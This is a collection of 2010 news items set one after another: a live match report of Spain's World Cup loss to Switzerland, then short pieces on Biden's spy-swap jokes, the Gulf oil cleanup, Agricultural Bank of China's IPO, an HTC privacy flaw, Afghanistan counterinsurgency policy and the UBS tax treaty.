16 min Silva scuffs a shot straight at Benaglio from the left corner of the box .
17 min Ramos zips dangerously into the box from the right and then toebungs fecklessly wide of the near post with his left foot when he should have tried to find a teammate .
18 min " Today 's coverage is n't displaying the same hackneyed cynicism which has ( rightly ) permeated much of the MBM World Cup coverage so far , leaving me a little bit disorientated , " says James Lachno .
" I feel like I 'm in a pub in Hoxton and some floppy haired indie afficionado is telling me how much he loves The Beatles , instead of bemoaning their earlier ' pop ' efforts or bigging up Wire and Kraftwerk .
Are Spain really THAT good ? "
Not really , I 'm just a relentlessly positive person .
I might call myself Sunshine .
19 min " I 'm thinking Spain will look devastating in the group phase like Brazil did in 1982 but like their spiritual forefathers will be undone by a brutal run of top class opposition further down the line , " says Michael Gibbons .
" Could they stick it to ( for example ) Portugal , Italy , Argentina and then Brazil in consecutive games ?
I do n't think so , though I 'd love to be proved wrong . "
I think they can .
After all , England would have won the 1998 World Cup had they beaten Argentina - Glenn Hoddle said so .
They only had Holland , Brazil and France after that .
As for this World Cup , Portugal and Italy are dire and Argentina are a rabble .
Plus Spain can make major changes for their last group game and minor changes for the second round and quarter - finals to keep players fresh .
21 min
This is quite boring .
There , I 've said it .
Sue me !
Spain are painfully easy on the eye , but Switzerland 's organisation and concentration is good and , against that , they are struggling to penetrate .
Iniesta shoots straight at Benaglio from 25 yards .
22 min " All this possession and ticky - tacky passing , " says Sean Boiling .
" Wo n't somebody think of the ball - boys ? "
23 min
The first real chance for Spain .
Iniesta played a stunning , forensic through ball to Pique , lurking in space on the right side of the box .
He came inside the sliding defender superbly - like a diluted version of his amazing goal v Inter - but then his low sidefooted was splendidly saved by the sprawling Benaglio .
26 min Xavi is penalised for a high foot by Howard Webb .
The free - kick is 25 yards out , right of centre , and Ziegler 's low left - footed shot is saved slightly awkwardly by Casillas , plunging to his left .
He could n't hold it but it was ultimately a pretty comfortable save .
27 min " All this tippy - tappy stuff from Spain , " sneers Ian Burch .
" Where 's their Billy Whitehurst or Barry Conlon when they need to go to plan B and hoof it up the field ? "
Ah , Bill .
I 'd love to see an energised Bill roaming the green at the World Cup .
One of the greats , that lad .
28 min Can we just call this World Cup off ?
Defending has become far too easy .
I got pelters for this when I wrote it on ma blog in 2006 , but I reckon football needs bigger pitches .
As that 's impossible , it should experiment at a lower level ( the Premier League , say ) , with the next best thing : 10 - a - side .
29 min " This must be a rogue Jabulani , " says Mark O'Neil .
" There must be something wrong with this one , it 's not flying into touch every time a player tries a long pass . "
30 min Iniesta runs onto Silva 's penetrative angled pass and then , on the edge of the box , comes back inside the last man Grichting and is dragged over .
That might have been a red card but Howard Webb gives him a yellow .
You could argue it was a soft foul but I thought he pulled him over .
The free - kick is in the D , and Villa 's withering strike deflects wide off the rump of Fernandes for a corner .
32 min Senderos will be going off injured any minute now .
" Need bigger goals , " says Alistair Stewart .
" Since the laws were first laid down the average human height has increased , making it easier for the ' keeper to cover more of the goal .
FACT ( possibly ) . "
But that only affects one facet of play and will just encourage hairy - arsed dockers to shoot from 30 yards .
Ten - a - side please !
34 min Here 's the latest from Nightmare Corner , with Ross Kitson : " If I was playing against that Spanish attack I would be having nightmares for days – but appreciative nightmares , like the one where you are really thankful as you are being beaten about by a charming semi-clad Amazonian woman . "
35 min Capdevila 's floated , right - footed cross from the left is headed back across goal by Villa and Switzerland clear a little desperately .
Moments later , a crestfallen Senderos is replaced by Von Bergen .
That 's really sad .
He actually did it when he slid in to clear the ball and kicked his own player .
36 min " I believe Algeria have already magnanimously offered to take up 10 - a - side for this , and indeed every other , tournament , " says Lee James .
" So far it does n't seem to result in a whole load of excitement .
Have we not considered multi- ball yet ?
It 's the future for idiots .
Fifa will love it . "
37 min
The trouble for Switzerland is that they are most vulnerable when they attack .
That was the case then , when they lost possession and Puyol immediately drifted a 50 - yard pass over the top for Iniesta .
He reversed it to Silva , whose cross was blocked at the expense of a corner .
38 min Switzerland win a corner on the right thanks to Barnetta .
They have some big lads in their side so approximately 100 per cent of their goalscoring opportunities are likely to come from corner .
Not that time : the delivery was poor and easily cleared .
39 min Spain have had 68 per cent of the possession , and I 'm surprised it 's that low .
" Good point about 10 - a - side Rob , but I reckon it should be even less than that , " says Chris Zacharia .
" I think most teams would just drop a striker and play 4 - 4 - 1 if it was 10 a side , continuing the terrible reign of defensive football .
Socrates ( as in the footballer ) claimed eight outfield players would be best . "
41 min Ramos passes the ball straight into touch .
Spain are struggling to penetrate , against Switzerland .
I can't believe this is happening .
I 've lost faith in everything .
43 min Ramos hoofs a 60 - yard pass to Villa , who got behind the defence for a moment .
Eventually he lays it back invitingly to Iniesta , 25 yards out , and he spanks it high and wide .
44 min " Not ten - a - side , but four groups of six to give us more matches where both sides have a reasonable expectation of winning and so are actually trying to win , not fearful of defeat in one match of three , " says Gary Naylor .
" It 's probably too easy to score in national leagues and there 's no problem in the Champions League once those mismatches in the group stages are disposed of . "
45 min Villa misses a decent chance .
He ran free down the inside - left channel after a good pass from Iniesta , came back inside the sliding Von Bergen on the corner of the six - yard box , but then chipped it extravagantly and wastefully across goal to safety .
He was going for goal , I think , but made a horlicks of it .
Half time : Spain 0 - 0 Switzerland Permission to weep for the future of football ?
46 min Spain kick off from right to left .
" If it was video that killed the radio star , it 's the deplorable habit of playing two holding midfielders that 's killing football , " says Dileep Premachandran .
" Even Spain are doing it .
Why do you need Busquets when you have Alonso there ?
Play Fabregas instead .
Or bring Torres on to hassle the defence ( and free up space for Villa ) . "
47 min Busquets pulls a short corner back to Alonso , who scrunches it miles over the bar from 20 yards .
HANG THE JABULANI !
48 min " That persistent drone is really annoying , " says Adam Forbes , lining up the inevitable gag .
" Any news on the BBC offering games with Mick McCarthy filtered out ? "
HONK !
I like McCarthy .
He 's an underrated manager and , I imagine , a deceptively tender lover .
49 min
There 's definitely more urgency this half from Spain , who for all their technical majesty were just a touch somnolent in the first half .
The overlapping Capdevila wins another corner but it 's eventually cleared when Silva falls over in the box and Imler clears .
50 min When Imler only half - clears Iniesta 's low cross from the left , Alonso sets a curler towards the far post from 25 yards .
It nicks off the head of Grichting and loops just over the top .
51 min Spain takes another short corner and Xavi 's left - footed cross nicks off the head of a defender before looping towards the far post .
Ramos piles in but Benaglio gets there first to palm it wide for a corner .
From that , Spain create half a chance .
Iniesta , having received another short corner , pings it deliberately beyond the far post to the unmarked Puyol .
He heads it - perhaps inadvertently - down to Silva , who screws wide .
GOAL !
Spain 0 - 1 Switzerland ( Fernandes 52 ) Switzerland take the lead with an absurd goal .
A long goal kick was headed down by Derdiyok towards Nkufo .
His return ball hit the knee of Derdiyok and bounced into a huge gap between Pique and Puyol .
As Derdiyok roared onto it , Casillas came out feet first and took him out .
Play continued and the ball hit Pique , ran loose to Fernandes , hit Pique again – who inadvertently fell on it with his hands – and then broke loose for Fernandes to tap in from two yards .
There were bodies flying everywhere there , like some sort of cartoon barroom brawl ; it was ridiculous .
Pique has a boxer 's cut above his right eye and is being treated for it .
54 min
In a daft way Spain are lucky to just have conceded a goal , because both Casillas and Pique could have given away a penalty and been sent off during that attack .
55 min " It 's just like watching Arsenal , " says Jackie Brunsdon .
56 min Pique very nearly turns Lichtsteiner 's low cross past Casillas .
He got nothing on it at the near post , but he stretched for it and , with Casillas committed , a touch would probably have taken it in .
It was very close .
57 min Iniesta plays an inviting pass to Villa , whose rudimentary left - footed curler from the edge of the box is easily saved by the sprawling Benaglio .
58 min " Hi Rob , " says Michael Minihan .
" Just to point out , I made love to Mick McCarthy at a motel just outside Doncaster and I can confirm your suspicions about him being a tender lover .
After the two of us had emptied the mini bar , he made off in the morning without paying though , typifying Premier League managers irresponsible attitude towards debt . "
59 min " I 'm watching this through a glass panel of a door with no sound , " says Mark Healey , " but should Casillas not have gone as well as the goal have been given ? "
I think I can answer your question : Howard Webb is the referee .
Technically , he could have played an advantage both for Casillas and Pique and then sent them both off after the goal .
Which , let 's be honest , would have been extremely amusing .
60 min " Why is it absurd that Switzerland have taken the lead ? " says Marco Rinaldi .
" Because you did n't want them to ?
Perhaps for the next Spain game there could be a slightly less biased reporter ? "
Or because they 've had about two attacks , perhaps ?
61 min Xavi plays a wonderful early pass through the defence for Villa , but Benaglio storms from his line and just gets there first .
62 min Spain make a double substitution : Jesus Navas replaces the superfluous Sergio Busquets , and Fernando Torres replaces the disappointing David Silva .
So now Spain will go to a 4 - 2 - 4 formation .
63 min When Villa 's shot is blocked , Iniesta bends a beautiful first - time effort fractionally wide of the left post from 20 yards with Benaglio motionless .
64 min
The shock is not so much that Switzerland are ahead - that can happen - but that they have been so comfortable .
Benaglio's saves have been little more than routine .
67 min " Is defending the new black ? " says Wilson Edgar .
" Mourinho must be laughing his socks off . "
68 min Torres curves wide from the edge of the area .
He ran ahead of the last man Grichting onto a square through pass from the left by Villa , but his first touch took him sideways and he had to spin around the ball to shoot across goal with his right foot .
It drifted a few yards wide .
69 min Derdiyok slings in a decent cross from the left towards Nkufo , whose header towards the near post deflects wide off Puyol .
Howard Webb considers all the evidence and gives a goalkick .
70 min Xabi Alonso hits the bar !
It was a scorching effort from 25 yards , when Xavi passed a low corner back to him .
Alonso marauded onto it and absolutely smashed it towards goal .
Benaglio barely knew what day it was , but the ball smacked off the the bar and down to safety .
72 min Switzerland are starting to tire .
Navas miscontrols the ball the wrong side of Ziegler and manages to run onto it , but his shot is weak and straight at Benaglio .
73 min " I 'm fairly sure I saw in a recent You Are The Ref that the red card for denying a goalscoring opportunity should not be issued in the case that the referee has played advantage and the attacking team have gone on to score , " says Ben Mabley .
" The logic being that no goalscoring opportunity was actually denied .
If it was a violent foul then you can still issue a red for that , though . "
74 min Howard Webb books Ziegler for tugging back Navas , who is giving him real problems on the right .
74 min Now Durdiyok hits the post for Switzerland !
It was a sensational solo run infield from the right after a neat one - two with Nkufo .
His dainty close control was beautiful and took him past both Pique and Puyol ; then , from 10 yards , he deliberately poked the ball wide of Casillas with his right foot , and it came flush off the post .
76 min " Anyone wants to buy my bets of Spain winning the cup ? " says Billy Leung .
77 min Pedro comes on for Iniesta , who limps off after a heavy but fair challenge from Lichtsteiner .
79 min
The excellent Navas controls a bouncing ball 25 yards out , right of centre , and then swooshes a fantastic bobbling effort just wide of the far post .
Switzerland make a substitution : Hakan Yakin replaces Derdiyok , who has been outstanding in the second half .
81 min Navas has made a difference , but Spain are n't really making Benaglio do too much .
This is extraordinary .
82 min Barnetta , cutting infield from the right , wobbles a good effort just over the top from 25 yards .
83 min " Ben Mabley might have seen in You Are The Ref something about not giving a red , " says Robin Hazlehurst , " but in a recent Howard Webb Is The Ref it was decided ok to give the goal , two reds and two penalties for the Swiss effort . "
84 min Pedro's deep cross is headed back across goal by Villa , but Grichting uses his body well to ensure Torres can't get his head on it .
" Experienced , solid defending ... " coos Mick McCarthy .
85 min Oh , Spain .
87 min Pedro tries to wriggle through the eye of the needle , but there is n't one .
Switzerland 's defensive discipline and concentration have been sensational .
When Torres gets a yard of space to run onto Pedro 's cross on the edge of the box , he boots it high and wide .
He has looked really rusty .
88 min Villa chests a classy ball to Torres , up against the last man Von Bergen , but he overruns it hideously .
90 min
There will be five minutes of added time .
Navas wins a corner .
90+1 min
The corner comes to nothing , with Pedro sidefooting a volley back whence it came for a goalkick .
90+2 min Howard Webb books the keeper Benaglio for timewasting .
Then Barnetta is replaced by Mario Eggimann , another defender .
90+3 min Pedro beats Lichtsteiner smartly on the left but Eggimann heads his cross clear .
Switzerland look as comfortable as could be expected under the circumstances .
90+5 min Hakan Yakin is booked for deliberately handling Capdevila 's cross .
The free - kick is 20 yards out on the left wing .
Alonso drills it into the wall ; it deflects to Villa by the touchline and he blasts it through a posse of bodies in the box .
90+6 min Spain win another corner on the right .
It 's swung in by Navas and half cleared to Xavi , who volleys high and wide .
It 's surely over now .
Full time : Spain 0 - 1 Switzerland Astonishing .
We knew Spain would breathe life into the World Cup , but we did n't expect it to be like this .
This is one of the great World Cup shocks and – most shocking of all – it 's fully deserved .
Spain did not create many clear chances and Switzerland , quite simply , did a number on them .
You might bemoan their anti-football tactics but nobody could dispute how well those tactics were planned by their marvellous manager Ottmar Hitzfeld and executed by an indefatigable and admirable group of players .
That was remarkable , and sets up the very real prospect of Brazil v Spain in the last 16 now .
Blimey .
Thanks for your emails ;
I 'm off to see if the world is still on its axis .
The great thing about North Korea is that you never know what 's fake and what 's not .
I think that the subtitles to this video are a joke , but with the genius of Kim Jong - il , you never know !
Advertisement
Image caption
It was Mr Biden 's first appearance on the show as vice - president
US Vice - President Joe Biden has been cracking jokes about the Russian spy scandal on a TV chat show .
Referring to one of 10 agents sent back to Russia , comedian Jay Leno on The Tonight Show asked Mr Biden : " Do we have any spies that hot ? "
Mr Biden said : " It was n't my idea to send her back . "
He also defended only getting four spies released by Moscow for the 10 that they returned .
The US and Russia made a spy swap on Friday on airport tarmac in Vienna .
It was Mr Biden 's first appearance on the show since taking office in 2009 , although he has taken part several times before being elected .
Mr Leno showed the vice - president a photo of 28 - year old Anna Chapman , one of the alleged spies .
In response to Mr Leno 's questioning , Mr Biden , in a mock - serious tone , told him : " Let me be clear .
It was n't my idea to send her back . "
Mr Leno also asked him why the US was only getting four people in return for the 10 accused spies they were letting go , saying it did not " seem fair " .
Mr Biden responded by saying : " We got back four really good ones " .
" And the 10 , they 'd been here a long time , but they had n't done much , " he added .
BP Oil Spill : Clean - Up Crews Can't Find Crude in the Gulf
As slick shrinks , experts say oil is breaking up , staying below surface .
BURAS , La. July 26 , 2010  --
For 86 days , oil spewed into the Gulf of Mexico from BP 's damaged well , dumping some 200 million gallons of crude into sensitive ecosystems .
BP and the federal government have amassed an army to clean the oil up , but there 's one problem -- they 're having trouble finding it .
Watch ' World News ' for the latest coverage on the Gulf oil spill .
At its peak last month , the oil slick was the size of Kansas , but it has been rapidly shrinking , now down to the size of New Hampshire .
Today , ABC
News surveyed a marsh area and found none , and even on a flight out to the rig site Sunday with the Coast Guard , there was no oil to be seen .
" That oil is somewhere .
It did n't just disappear , " said Plaquemines Parish President Billy Nungesser .
Salvador Cepriano is one of the men searching for crude .
Cepriano , a shrimper , has been laying out boom with his boat , but he 's found that there 's no oil to catch .
" I think it is underneath the water .
It 's in between the bottom and the top of the water , " Cepriano said .
Even the federal government admits that locating the oil has become a problem .
" It is becoming a very elusive bunch of oil for us to find , " said National Incident Cmdr .
Thad Allen .
Skimmers Pick Up Less Oil
The numbers do n't lie : two weeks ago , skimmers picked up about 25,000 barrels of oily water .
Last Thursday , they gathered just 200 barrels .
Still , it does n't mean that all the oil that gushed for weeks is gone .
Thousands of small oil patches remain below the surface , but experts say an astonishing amount has disappeared , reabsorbed into the environment .
" [ It 's ] mother nature doing her job , " said Ed Overton , a professor of environmental studies at Louisiana State University .
Experts : Gulf of Mexico Oil is Breaking Up
The light crude began to deteriorate the moment it escaped at high pressure , and then it was zapped with dispersants to speed the process along .
The oil that did make it to the ocean 's surface was broken up by 88 - degree water , baked by 100 - degree sun , eaten by microbes , and whipped apart by wind and waves .
Experts stress that even though there 's less and less oil as time goes on , there 's still plenty around the spill site .
And in the long term , no one knows what the impact of those hundreds of millions of gallons will be , deep in the waters of the Gulf of Mexico .
Click here to return to the ' World News ' page .
College graduates who took a detour around the weak job market by going back for advanced degrees are beginning to emerge from those programs — and finding job prospects are n't much better than they were a couple of years ago .
The jobless rate for 20 - to 34 - year - olds with master 's degrees , though well below the overall 9.5 % U.S. average , was 4.2 % in June , the Labor Department said Friday , up from 3.9 % last year and 2.9 % in June 2007 , before the recession started .
The economy has started creating jobs — albeit at a slow rate — in recent months .
But those with new master 's degrees often are n't at the front of the line to get them , say experts .
One reason :
They frequently compete for jobs that require those advanced degrees with older workers who have the advantage of more work experience .
Caitlin Johnson , 23 years old , may soon find herself among them .
A 2009 graduate of Massachusetts Institute of Technology with a B.S. in computer - science and engineering , she said she was unable to land any of the 10 positions she applied for .
So she opted to stay at MIT for her master 's in engineering .
Having just finished her first year of the two - year program , Ms. Johnson said she might look for a job at the end of the summer to start after she completes the degree next year .
But finding graduate school more appealing and facing a job market that remains weak , she said she would most likely go on to earn her Ph.D .
THE $ 19.2 billion raised by Agricultural Bank of China 's initial public offering ( IPO ) , which was priced on July 6th and 7th , does not simply mark one of the world 's largest - ever stockmarket listings ( the biggest , if the bank fully exercises a right to issue additional shares ) .
It also ends a decade - long process to transform China 's huge financial institutions from wards of the state to banks that resemble publicly listed firms in the rich world .
The deal attracted more than the usual amount of attention — in part because of ongoing palpitations in global markets , in part because Chinese share prices in particular have collapsed in recent months , and in part because the listing coincides with fierce debate about the health of China 's banking system .
Agricultural Bank itself is notable for both its gargantuan size ( 320 m customers ) and its giant past loan losses .
Optimists see it as a superb macro play on China , pessimists as a Chinese version of Fannie Mae and Freddie Mac , America 's nominally private , and deeply flawed , housing - finance firms .
Pricing was a matter of guesswork until the last moment .
Outside China , big investors seemed anxious to buy in .
“ Cornerstone ” investors included sovereign - wealth funds ( Qatar and Kuwait ) , banks ( Standard Chartered , Rabobank , Singapore 's United Overseas Bank ) , a global agricultural giant , Archer Daniels Midland , and the now usual smattering of tycoons ( Hong Kong 's Li Ka-shing and Australia 's Kerry Stokes ) .
Inside China , internet polls suggested retail investors were less keen .
These differing perspectives may explain a rare outcome for dual - listed shares : the bank 's stock was valued more highly ( by around 5 % ) in Hong Kong than Shanghai .
The deal marks the end of a reform process launched by Zhu Rongji , the then prime minister , in 2002 .
It involved multiple rounds of bad - debt scrubbing , internal reorganisations and , finally , public listings .
A series of spectacularly large public offerings began in June 2005 when the Bank of Communications , once the country 's dominant industrial bank but now just outside the dominant big four , raised $ 2 billion in Hong Kong .
That deal was followed in short order by China Construction Bank , raising $ 8 billion in October of that year ; Bank of China , with a $ 10 billion capital - raising in June 2006 ; and ICBC , whose $ 22 billion joint listing in Shanghai and Hong Kong in the autumn of 2006 was the previous biggest - ever .
Global league tables have been transformed by the listings ( see chart ) .
In theory , Chinese banks are now the world 's dominant institutions , with tons of room to grow at home and the heft to buy almost any financial firm .
The future of finance could , in short , be China's .
But there is a lot of work to do before that happens .
The next phase of reform has two components .
The first is to clean up and list many of the hundred or so other financial institutions that remain in government hands , and bring some sort of order to the thousands of rural co-operatives quietly operating outside of the government 's direct control .
That will not be easy .
Many unlisted outfits are run by local municipalities that derive substantial benefits from them , either directly or through politically directed loans .
They will not give up control without a fight .
The second is to enforce genuine commercial discipline and transparency .
Mr Zhu believed that public offerings and foreign investors would put the banks under greater scrutiny , distance them from bureaucratic control and be a first step towards making them more efficient .
But any pretence to true independence evaporated last year when , as part of the government 's stimulus plan , bank lending surged despite the global slump and far weaker overseas demand for Chinese products .
Chinese bankers argue that the government gave “ guidance ” rather than handing down specific targets ; that the expansion was more aggressive for some banks than for others ; and that lending largely supported creditworthy projects .
But every bank ballooned in size , and there are strong suspicions that problems lurk beneath the surface of banks ' loan books .
In 2009 Agricultural Bank 's earnings rose by a staggering 26 % ( and by 41 % on a pre-tax basis ) because credit to customers grew by one - third .
The bank committed 1 trillion yuan ( $ 150 billion ) in loans , about triple the bank 's underlying pre-IPO equity .
By setting a ceiling on what can be paid for deposits and a floor on what can be charged for loans , China provides banks with plenty of opportunity to make money as long as credit quality remains better than abysmal .
That has not been the case in the past : as recently as 2008 the government paid full value for 816 billion yuan ( $ 117 billion ) of dud loans on Agricultural Bank 's books ( about a quarter of the bank 's total ) .
Last year 's lending surge threatens a repeat , which would leave a sour aftertaste after the relative outperformance of China 's banks during the crisis .
As well as the absolute expansion in lending , two other areas of China 's banking system have begun to receive particular attention from regulators and outside analysts : loans backed by local municipal guarantees and loans transferred off banks ' balance - sheets to trust companies , among other entities , which then sold them off as wealth - management products .
Despite more public reporting , levels of opacity on such lending remain high .
In contrast , what is absolutely clear is the voracious hunger the Chinese banks have for more money — a consequence of rapid growth but also , if the past is any guide , of the need for recapitalisations to fill in the craters caused by bad loans .
This year alone , according to Dealogic , Chinese banks have raised or will raise at least $ 89 billion .
The Asia head of one global bank says he sees additional large rounds of financing every two to three years by big Chinese banks for at least the next decade , if not beyond .
It makes sense for Chinese institutions to dive into capital markets .
Whether investors keep meeting them there is less certain .
Share this article on LinkedIn Email
Formula 1 tyre supplier Bridgestone has opted to bring a more extreme variation of tyres to the German Grand Prix as part of its push to try and help improve the show .
After revealing last week following Canada that it was willing to be more radical with its tyre choice over the remainder of the season , Bridgestone will bring the super soft and hard tyres to Hockenheim - meaning a two - step jump in tyres .
Hirohide Hamashima , Bridgestone 's head of motorsport tyre development , said : " The characteristics of the Hockenheim circuit allow us to bring the compounds from the extremes of our softness range .
" This will give us very good data for evaluation and will be interesting for those who have called for a bigger difference between the allocated tyres . "
Bridgestone will revert to a single step between the super soft and mediums in Hungary and Singapore , while the softs and hards will be used in Belgium and Italy .
Hamashima added : " The Hungaroring requires a softer allocation as finding grip is always a target there .
Spa and Monza are high speed tests for cars and tyres , needing a harder allocation because of the heat durability requirements .
Singapore is a high - speed street course where the softer allocation is suited . "
June must be the month when privacy issues leave their hibernation and return to trouble our fragile minds .
First we had Flash going loco , then AT&T's airwaves exploded with iPad users ' email addresses , iPhone 4 pre-orders started sending people to the wrong account , and now this .
Boy Genius Report has come across a rather worrying " feature " of the HTC Sense bookmarking widget on the Incredible , which takes sporadic screenshots of your browsing sessions .
That would n't be so bothersome in itself , but try to remove said pictures , and you find where the problem lies .
Ending the browsing session , deleting your history , and even a full reset to factory settings failed to eviscerate the indiscreet imagery .
You have to manually discover their location and delete them by hand .
Considering the high likelihood of Incredibles being sold and resold for years to come , this could turn the phone into a little cache of treasure for the proactive identity thief .
And since it 's a Sense issue , it might be affecting other HTC handsets as well .
Wunderbar .
Eminem has revealed that Elton John calls him once a week to check that he is staying off drugs .
The unlikely pair became friends after performing together at the 2001 Grammy Awards .
Both have suffered from drug addictions , with Elton developing a cocaine problem in the 1980s and Eminem becoming hooked on prescription drugs around 2005 .
Eminem , 37 , said : “ Elton calls me once a week .
He ’s somebody who is in the business and can identify and relate to the lifestyle and how hectic things can be for artists .
He understands the pressure . ”
He added : “ I reached out to him and told him , ‘ Look , I ’m going through a problem and I need your advice ’ . ”
In the last decade , Elton and his civil partner David Furnish have become celebrity agony uncles for other stars addicted to drugs .
They are thought to have staged an intervention to help fashion designer Donatella Versace kick drugs , although George Michael refused the couple ’s offers of help , telling Elton to “ shut his mouth ” .
President Obama ’s declaration last week that a change in personnel will not mean a change in policy suggests that the administration took only some of the lessons contained in Michael Hastings ’ Rolling Stone article .
America ’s problems in Afghanistan are not fundamentally about personnel , command and control , or civil - military relations .
In the spaces between the controversial quotes from Gen. Stanley McChrystal and his staff , one finds more instrumental – and more troubling – explanations for US difficulty .
The article describes a group of soldiers frustrated about the increasingly restrictive rules of engagement ( ROEs ) under which they have to operate .
The troops explained that they are hamstrung , unable to protect themselves and use their superior firepower to fight the enemy .
This is not the first time these concerns have been reported ; signs of such dissatisfaction among American troops have been emerging for months .
A New York Times article last week described the restrictions on return fire as having become so tight that pilots cannot engage enemy fighters unless they see a weapon .
Some troops now purposely expose their position and draw enemy fire in order to get approval for fire support from the air .
At his confirmation hearing Tuesday , Gen. David Petraeus pledged to reevaluate ROEs .
“ Those on the ground must have all the support they need when they are in a tough situation , ” he said , vowing to “ find that balance ” between protecting soldiers and limiting civilian casualties .
General Petraeus ’s review is welcome , but it must recognize that restrictive rules are symptoms of a larger problem .
The experience of troops on the ground is part of the growing body of evidence that America ’s reliance on the prevailing theory of counterinsurgency , or “ COIN , ” is at best problematic .
The restrictive ROEs have been put in place because of modern COIN doctrine ’s central tenet :
The way to succeed is to win over the population .
Because the “ people are the prize , ” the theory goes , they must not be unduly offended or harmed .
This fundamental imperative is intended to drive all other aspects of the campaign .
Certainly very few would argue against protecting innocent civilians ; we have a moral and legal obligation to do so .
Most Americans do not want US and NATO troops to be aggressors , and some would argue that the new restraint is a necessary corrective to heavy - handedness in the early years of the conflicts in Iraq and Afghanistan .
Indeed , the inadvertent killing of civilians in Afghanistan has been a perennial problem for the coalition .
Yet despite the increasingly restrictive ROEs , recent reports suggest that civilian deaths have actually increased in 2010 .
Meanwhile , June was one of the deadliest months for US forces in the nine - year war .
Focusing on the needs and views of the population also appeals to the democratic sensibilities of Western intellectuals .
For all these reasons and more , the notion of winning over the population is intuitively attractive , and most analysis of it stops with its articulation .
But allied forces on the ground may justifiably ask how “ winning over ” the population leads inexorably to the desired chain of events that ends in US and coalition success .
And how will progress in implementing this open - ended mandate be credibly measured ?
How much of the population needs to be “ won ” and how is this manifested ?
Who should do the “ winning ? ”
Perhaps more important , there are serious questions about how achievable this objective is in Afghanistan .
Recent research suggests that financial blandishments do not buy hearts and minds , and that pumping money into poor and troubled societies alienates more people than it wins .
The US and its allies are providing billions in aid to a country with a per-capita GDP of less than $ 400 – a formula destined to supercharge the very corruption that impedes the development of good governance and builds resentment among ordinary people .
What if military restraint backfires and the population sees the US and NATO as weak and unable to defend them ?
And is it realistic to suppose that a foreign power could ever gain the trust and esteem of the largely tribal people of Afghanistan , whose suspicion of outsiders is legendary ?
Without such specifics , the theory is reduced to a large - scale charm offensive , with no means to link action with outcomes .
But what is the alternative ?
Alienating the population and harming civilians will not help anyone either .
The answer is that the administration should take the opportunity presented by the recent unexpected change in command to refine US objectives and the means for reaching them .
The US and its allies are not in Afghanistan to win the enduring affection of the Afghan people , however commendable such instincts may be .
Given a price tag of nearly $ 100 billion a year , more than 1,100 American lives ( including at least 58 in June ) , incalculable strategic opportunity costs , and a debatable link to preventing threats to the US , it is critical that the administration provides a clear definition of America ’s purpose in Afghanistan and articulates more specifically how COIN theory will help achieve it .
It is not enough to argue that “ we did it in Iraq , ” since that proposition is also a matter of serious debate , and the conditions in Afghanistan are materially different .
America ’s troops have the right to question restrictions on them that may shift the advantage to the enemy and the risk to themselves , and to expect a coherent explanation as to why such restrictions may improve the prospects for success or protect the United States .
If the administration is determined to persist – at least for the next year – in the large - scale commitment of forces , it is only proper to ensure that the risks being taken by America ’s fighting men and women are truly purposeful .
Celeste Ward Gventer , a senior defense analyst at the RAND Corporation , was political adviser to the operational commander of US forces in Iraq in 2006 and deputy assistant secretary of defense for stability operations capabilities in 2007 - 08 .
--
You might also like : Beyond the McChrystal , Petraeus drama : a counterinsurgency reality check
CEO pay in Japan
I can't decide whether the right introduction to this post is " I 'm moving to Japan " or " I 'm not moving to Japan . "
On June 30 securities regulators began requiring Japanese companies to disclose pay for executives making more than 100 million yen ( $ 1.1 million ) .
...
Although pay for Japanese executives has more than doubled in the past decade , the government says , fewer than 300 people at Japan 's 3,813 public companies earned enough in 2009 to require disclosure .
The chairman of Toyota makes $ 1.5 million .
The CEO of Toyota makes less than $ 1.1 million .
So does everyone at Panasonic .
More here .
It 's a reminder that CEOs are n't just paid what the market will bear , they 're paid what the culture will accept .
Update : Megan McArdle complicates the picture .
Exercises You Should Be Doing : Ball to Wall Rhythmic Stabilizations
Share
This :
What Is It : Ball to Wall Rhythmic Stabilizations
Who Did I Steal it From : Mike Reinold , the same guy whom I “ stole ” quadruped rhythmic stabilizations from a few months ago .
What Does It Do :
As I ’ve noted in the past , the main function of the rotator cuff is n’t so much external / internal rotation , as well as elevation of the humerus ( although those are a few of its main actions ) ; rather , the main job of the RC is to center the humeral head in the glenoid fossa , providing more dynamic stability .
While in the video I demonstrate the exercise being done in a closed - loop ( predictable ) fashion , ideally this exercise would be performed with a partner lightly tapping the forearm in a more open - loop ( unpredictable ) fashion .
Key Coaching Cues :
It ’s important to “ pack ” the shoulder DOWN throughout the duration of the exercise .
Many trainees make the mistake of “ shrugging ” and / or abducting ( protracting ) the shoulder blade , which defeats the whole purpose of the exercise in the first place .
From there , all you ’ll do is gently move the ball in a multi- directional fashion – up , down , clockwise , counter - clockwise , etc .
Furthermore , if you ’re going to do this with a partner , it ’s important to note that he or she should n’t be too aggressive with the force they apply .
Again , all they need to do is gently tap the forearm – not try to break it .
All in all , you ’re looking for 2 - 3 sets of 5 - 10 seconds per position ( two in all ) , per arm .
Fist pump optional .
But what ’s not optional is how I ’m going to destroy the back of pants watching Inception this weekend .
Did what you just read make your day ?
Ruin it ?
Either way , you should share it with your friends and / or comment below .
Share This Post :
ZURICH ( Reuters ) - The Swiss parliament has finally backed a treaty to give the U.S. government details of clients UBS AG helped dodge taxes , ending nearly a year of uncertainty that threatened the Swiss bank ’s recovery .
The logo of Swiss bank UBS is seen at the company 's office at the Bahnhofstrasse in Zurich in this July 1 , 2009 file photo .
REUTERS / Arnd Wiegmann / Files
The two houses of parliament agreed not to hold a referendum on the treaty after crisis talks on Thursday , so Swiss tax authorities should be able to hand over on time the details of the 4,450 clients , lifting the veil on Switzerland ’s cherished tradition of banking secrecy .
Berne and Washington cut the deal last August to end a damaging lawsuit against UBS , Switzerland ’s biggest bank .
But UBS ’ wealthy clients continued to leave in droves as the threat of further legal action loomed if Switzerland failed to deliver on its promises within a year .
“ UBS is finally off the hook and will regain ground in its wealth management business , ” said Sarasin analyst Rainer Skierka .
Thursday ’s vote will bolster UBS Chief Executive Oswald Gruebel ’s attempts to steer the world ’s second - biggest wealth manager to recovery after a government bailout in the financial crisis .
Client cash could stop gushing from UBS by the end of 2010 , turnaround specialist Gruebel assured investors last month , as the bank booked its biggest quarterly profit since he took charge .
The timetable for a referendum would have prevented the handover of the client accounts on time , breaking the terms of the tax treaty and risking U.S. retaliation that would have shaken clients ’ confidence further .
“ Parliamentary approval means that nothing now stands in the way of UBS client details being disclosed , ” the Swiss Justice Ministry said .
Swiss tax administrators were on course to deliver the details on time , the Swiss Foreign Ministry said , adding 500 UBS client names had already been disclosed to the United States with the clients ’ agreement .
“ Following the parliamentary decision , details of approximately 1,200 cases can be disclosed to the U.S. , ” the Foreign Ministry said , signaling that 1,800 decisions could soon follow .
